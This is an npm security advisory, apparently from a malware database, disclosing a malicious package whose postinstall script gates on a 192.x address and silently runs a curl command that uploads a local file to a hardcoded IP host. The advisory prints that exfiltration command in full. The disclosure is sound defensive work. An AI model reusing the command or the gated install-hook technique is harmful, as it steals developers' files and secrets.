npm · Malicious package advisory
Malware@thomlecter1122/lab-helper-test
MAL-2026-5534
Malicious code in @thomlecter1122/lab-helper-test (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a)
The package ships a `postinstall` lifecycle script (`sec_check.js`) that fires automatically on `npm install`. The script first checks whether the host has a non-internal IPv4 address beginning with `192.` (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes `curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt"` via `child_process.execSync` with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper.
Compromised versions (6)
- 0.0.16
- 0.0.11
- 0.0.15
- 0.0.2
- 0.0.5
- 0.0.3
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.